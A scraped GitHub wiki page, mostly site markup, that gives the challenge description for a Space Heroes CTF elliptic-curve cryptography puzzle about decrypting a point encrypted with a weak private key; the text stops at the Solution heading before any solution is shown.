octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">Space Heroes CTF : Easy Crypto Challenge</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-15T01:12:43Z" class="no-wrap">Apr 15, 2022</relative-time> · 5 revisions </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>My slingshotter cousin Maneo just discovered a new cryptography scheme and has been raving about it since. I was trying to tell him the importance of setting a large, random private key, but he wouldn't listen. Guess security isn't as important as how many thousands of credits he can win in his next race around the system.I've recovered a message sent to him detailing the finish line. Can you decrypt the message to find the coordinates so I can beat him there? I'll give you a percentage of the score!Enter flag as shctf{x_y}, where x & y are the coordinates of the decrypted point.Hint: You may wish to consult the great Sage of Crypto for help on this challenge.<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h1>ecc.txt<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 